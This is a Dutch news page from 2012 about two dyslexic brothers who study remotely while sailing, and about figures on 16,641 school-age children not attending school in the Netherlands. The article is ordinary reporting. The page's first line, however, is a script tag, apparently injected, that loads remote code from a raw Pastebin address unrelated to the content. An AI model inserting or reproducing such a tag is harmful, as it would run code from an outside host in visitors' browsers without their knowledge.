<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


zeilende broers vragen aandacht voor de 16600 thuiszitters 14 oktober 2012
In het NRC van 5 oktober staat het verhaal van Enrique (15) en Hugo (13) Claassen, twee dyslectische broers uit Vijfhuizen, Omdat geen enkele middelbare school in de buurt van Heemstede hen, naar eigen zeggen, accepteert vanwege hun leeshandicap volgen zij nu al zeilend onderwijs-op-afstand via de Wereldschool.

Met hun zeiltocht willen de broers tevens aandacht vragen voor „de naar schatting 16.000 thuiszitters in Nederland”. Hulp kregen zij van kinderombudsman Marc Dullaert. Hij opende een digitaal meldpunt om na te gaan of scholen hun zorgplicht veronachtzamen. Bijvoorbeeld door kinderen te weigeren die passend onderwijs nodig hebben vanwege leer- of gedragsproblemen.

Het meldpunt is inmiddels gesloten. In drie weken ontving Dullaert „enkele honderden reacties”, zegt zijn woordvoerder. De meldingen variëren van kinderen die geen plaats op school kregen nadat ze een tijd in een instelling hadden gezeten tot jongeren die geweerd werden omdat ze extra ondersteuning nodig hadden als gevolg van gedragsproblemen of een stoornis. Dullaert presenteert zijn bevindingen komend voorjaar aan de minister van Onderwijs en de Tweede Kamer.

Demissionair minister Van Bijsterveldt (Onderwijs, CDA) verwacht dat met de invoering van de Wet passend onderwijs, voorzien in augustus 2014, het aantal niet-schoolgaande kinderen drastisch zal afnemen. Scholen zijn over twee jaar verplicht een passende onderwijsplek aan te bieden, ook voor kinderen met leer- en/of gedragsproblemen. Ouders hoeven zelf niet meer op zoek. Ook de familie Claassen niet.

Kinderombudsman Dullaert stelde bij de opening van zijn meldpunt dat scholen steeds strengere toelatingseisen hanteren: leerlingen met leer- of gedragsproblemen zouden worden geweerd, omdat ze veel geld en energie kosten.


16.641 niet op school

In antwoord op Kamervragen schreef minister Van Bijsterveldt (Onderwijs, CDA) dit voorjaar dat Nederland in het schooljaar 2010-2011 5.436 ‘thuiszitters’ telde. Dat zijn leerlingen die wel bij een school staan ingeschreven, maar langer dan vier weken zonder toestemming thuis zitten. Daarnaast waren er nog eens 8.098 jongeren in de leerplichtige leeftijd (vijf tot zestien jaar) die überhaupt niet ingeschreven stonden bij een onderwijsinstelling. Tel daarbij nog eens 3.107 vrijstellingen, bijvoorbeeld voor kinderen met een ernstige geestelijke handicap, en het aantal niet-schoolgaande maar wel leerplichtigen kwam uit op 16.641. Dat is een lichte stijging ten opzichte van 2009-2010 (15.024). Betrouwbare cijfers uit voorgaande jaren zijn niet voorhanden. Van Bijsterveldt put hoop uit het feit dat het aantal naar school teruggeleide kinderen in absolute zin is toegenomen: van 6.013 naar 7.578.

<< Terug